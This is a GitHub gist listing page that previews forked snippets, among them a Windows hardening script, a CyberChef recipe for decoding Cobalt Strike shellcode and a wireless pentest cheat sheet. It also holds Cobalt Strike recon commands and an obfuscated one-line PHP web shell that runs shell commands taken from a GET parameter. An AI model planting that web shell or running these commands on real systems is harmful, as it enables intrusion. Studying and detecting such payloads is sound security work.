Skip to content

Instantly share code, notes, and snippets.

View tuantmb's full-sized avatar
😹

Tuan T tuantmb

😹
  • Vietnam
View GitHub Profile
@tuantmb
tuantmb / WSL-ssh-server.md
Created February 18, 2020 03:49 — forked from dentechy/WSL-ssh-server.md
A step by step tutorial on how to automatically start ssh server on boot on the Windows Subsystem for Linux

How to automatically start ssh server on boot on Windows Subsystem for Linux

Microsoft partnered with Canonical to create Bash on Ubuntu on Windows, running through a technology called the Windows Subsystem for Linux. Below are instructions on how to set up the ssh server to run automatically at boot.

  1. Edit the /etc/ssh/sshd_config file by running the command sudo vi /etc/ssh/sshd_config and do the following
    1. Change Port to 2222 (or any other port above 1000)
    2. Change PasswordAuthentication to yes. This can be changed back to no if ssh keys are setup.
  2. Restart the ssh server:
    • sudo service ssh --full-restart
  3. With this setup, the ssh server must be turned on every time you run Bash on Ubuntu on Windows, as by default it is off. Use this command to turn it on:
@tuantmb
tuantmb / windows_hardening.cmd
Created March 10, 2020 05:21 — forked from api0cradle/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@tuantmb
tuantmb / cobaltstrike_sa.txt
Created March 10, 2020 10:49 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@tuantmb
tuantmb / ida_memdump.py
Created April 25, 2020 02:56 — forked from herrcore/ida_memdump.py
Dump a blob of memory into a file - IDA Pro script
import idautils
import idaapi
def memdump(ea, size, file):
data = idc.GetManyBytes(ea, size)
with open(file, "wb") as fp:
fp.write(data)
print "Memdump Success!"
@tuantmb
tuantmb / Wireless Penetration Testing Cheat Sheet.md
Created April 28, 2020 01:06 — forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@tuantmb
tuantmb / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created May 4, 2020 09:48 — forked from 0xtornado/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@tuantmb
tuantmb / readme.md
Created May 8, 2020 08:09 — forked from psiborg/readme.md
Apple Magic Mouse and Windows 10 #windows
  1. Download the latest version of the "Boot Camp Support Software" (e.g., 5.1.5722) from https://support.apple.com/downloads/bootcamp
  2. Unzip the file (e.g., bootcamp5.1.5722.zip) to a new directory
  3. Run BootCamp\Drivers\Apple\AppleWirelessMouse64.exe
  4. Turn on Bluetooth and pair your Magic Mouse

Note: Apple wireless mouse devices have a built-in passcode of "0000" (four zeros).

@tuantmb
tuantmb / rev_shell.php
Created May 8, 2020 11:35 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@tuantmb
tuantmb / outlook.conf
Created May 14, 2020 09:35 — forked from enoch85/outlook.conf
# nginx@nginx:~$ cat /etc/nginx/sites-available/outlook.conf
server {
listen 192.168.128.2:80;
server_name yourdomain.com;
return 301 https://yourdomain.com$request_uri;
}
server {
listen 192.168.128.2:443;
@tuantmb
tuantmb / dynamic-dns.txt
Created June 4, 2020 07:03 — forked from neu5ron/dynamic-dns.txt
List of Dynamic DNS Domains/FQDNs. Make sure to download this as zip,because the list is so long it wont display fully in a web browser..even using the "Raw" link won't work. The ZIP link is just in the top right labeled "Download ZIP". For a list of dynamic dns providers see: https://gist.github.com/neu5ron/860c158180e01b61a524
3d-game.com #dtdns.com
4irc.com #dtdns.com
b0ne.com #dtdns.com
bbsindex.com #dtdns.com
chatnook.com #dtdns.com
darktech.org #dtdns.com
deaftone.com #dtdns.com
dtdns.net #dtdns.com
effers.com #dtdns.com
etowns.net #dtdns.com